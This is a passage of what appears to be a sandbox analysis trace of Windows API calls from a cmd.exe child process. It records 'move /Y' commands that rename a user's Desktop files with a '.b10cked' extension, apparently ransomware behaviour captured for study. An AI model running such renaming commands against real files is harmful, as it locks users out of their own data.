SetErrorMode (uMode=0x1) returned 0x0 [0225.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2af0e4, lpFilePart=0x2af0cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x2af0cc*="65OAv.bmp") returned 0x30 [0225.184] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x12 [0225.185] _wcsicmp (_String1="65OAv.bmp", _String2=".") returned 8 [0225.185] _wcsicmp (_String1="65OAv.bmp", _String2="..") returned 8 [0225.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.185] SetErrorMode (uMode=0x0) returned 0x0 [0225.185] SetErrorMode (uMode=0x1) returned 0x0 [0225.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2af560, lpFilePart=0x2af2f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x2af2f8*="65OAv.bmp") returned 0x30 [0225.185] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] SetErrorMode (uMode=0x0) returned 0x0 [0225.185] SetErrorMode (uMode=0x1) returned 0x0 [0225.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2af768, lpFilePart=0x2af2f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", lpFilePart=0x2af2f8*="65OAv.bmp.b10cked") returned 0x38 [0225.185] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] SetLastError (dwErrCode=0x0) [0225.186] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp.b10cked")) returned 0xffffffff [0225.186] GetLastError () returned 0x2 [0225.186] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", fInfoLevelId=0x1, lpFindFileData=0x2aec74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec74) returned 0x50eb0 [0225.186] FindNextFileW (in: hFindFile=0x50eb0, lpFindFileData=0x2aec74 | out: lpFindFileData=0x2aec74) returned 0 
[0225.186] GetLastError () returned 0x12 [0225.187] FindClose (in: hFindFile=0x50eb0 | out: hFindFile=0x50eb0) returned 1 [0225.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", fInfoLevelId=0x1, lpFindFileData=0x61c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x61c08) returned 0x50eb0 [0225.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2aef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", lpFilePart=0x0) returned 0x38 [0225.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2aef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x0) returned 0x30 [0225.188] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.188] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp.b10cked"), dwFlags=0x3) returned 1 [0225.189] FindClose (in: hFindFile=0x50eb0 | out: hFindFile=0x50eb0) returned 1 [0225.189] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeec0 | out: _Buffer=" 1") returned 9 [0225.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.189] GetFileType (hFile=0x7) returned 0x2 [0225.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aee4c | out: lpMode=0x2aee4c) returned 1 [0225.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.403] 
GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aee80 | out: lpConsoleScreenBufferInfo=0x2aee80) returned 1 [0225.404] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.404] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x2aeec0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aeea4, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x2aeea4*=0x1a) returned 1 [0225.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.405] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.405] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.405] SetConsoleInputExeNameW () returned 0x1 [0225.405] GetConsoleOutputCP () returned 0x1b5 [0225.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.405] exit (_Code=0) Process: id = "590" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username 
= "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33589 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33590 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33591 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33592 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33593 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33594 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33595 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33596 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33597 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" 
Region: id = 33598 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33717 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33718 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33719 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33720 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33721 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 33722 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33723 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33724 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33725 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33726 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33727 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33728 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33729 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33730 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33731 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 33732 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33733 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33734 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33735 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33736 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000e0000" filename = "" Region: id = 33737 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33738 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 33739 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 33740 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 813 os_tid = 0xee4 [0225.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fdac | out: lpSystemTimeAsFileTime=0x22fdac*(dwLowDateTime=0xb9b8a6e0, dwHighDateTime=0x1d440a9)) [0225.072] GetCurrentProcessId () returned 0x15c [0225.072] GetCurrentThreadId () returned 0xee4 [0225.072] GetTickCount () returned 0x3e262 [0225.072] QueryPerformanceCounter (in: lpPerformanceCount=0x22fda4 | out: lpPerformanceCount=0x22fda4*=28186108721) returned 1 [0225.073] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.073] __set_app_type (_Type=0x1) [0225.073] __p__fmode () returned 0x76b331f4 [0225.073] __p__commode () returned 0x76b331fc [0225.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.073] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.073] GetCurrentThreadId () returned 0xee4 [0225.073] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee4) returned 0x38 [0225.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.073] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.074] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fd3c | out: phkResult=0x22fd3c*=0x0) returned 0x2 [0225.074] VirtualQuery (in: lpAddress=0x22fd73, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.074] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fd0c, dwLength=0x1c | out: lpBuffer=0x22fd0c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.074] GetConsoleOutputCP () returned 0x1b5 [0225.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.074] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.074] _get_osfhandle (_FileHandle=1) returned 0x7 
[0225.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.075] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.075] GetEnvironmentStringsW () returned 0x3a0180* [0225.075] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0225.076] GetEnvironmentStringsW () returned 0x3a0180* [0225.076] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0225.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ecac | out: phkResult=0x22ecac*=0x40) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0xa8, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x0, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegCloseKey (hKey=0x40) returned 0x0 [0225.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ecac | out: phkResult=0x22ecac*=0x40) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x40, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x1, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x0, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, 
lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x4, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x4) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ecb4, lpData=0x22ecb8, lpcbData=0x22ecb0*=0x1000 | out: lpType=0x22ecb4*=0x0, lpData=0x22ecb8*=0x9, lpcbData=0x22ecb0*=0x1000) returned 0x2 [0225.078] RegCloseKey (hKey=0x40) returned 0x0 [0225.078] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.078] srand (_Seed=0x5b8863b9) [0225.078] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" [0225.078] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"" [0225.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.078] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.079] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: 
lpBuffer="") returned 0x0 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.079] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.079] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.079] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.079] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.079] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.079] GetEnvironmentStringsW () returned 0x3a22d0* [0225.079] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0225.080] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.080] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.080] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.080] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.080] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.080] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.080] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.080] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fa78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fa78, lpFilePart=0x22fa74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x22fa74*="Desktop") returned 0x18 [0225.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.080] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.080] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.081] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f7f4 | out: lpFindFileData=0x22f7f4) returned 0x3a0010 [0225.081] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0225.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.081] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.081] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.081] GetEnvironmentStringsW () returned 0x3a2af0* [0225.081] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0225.082] 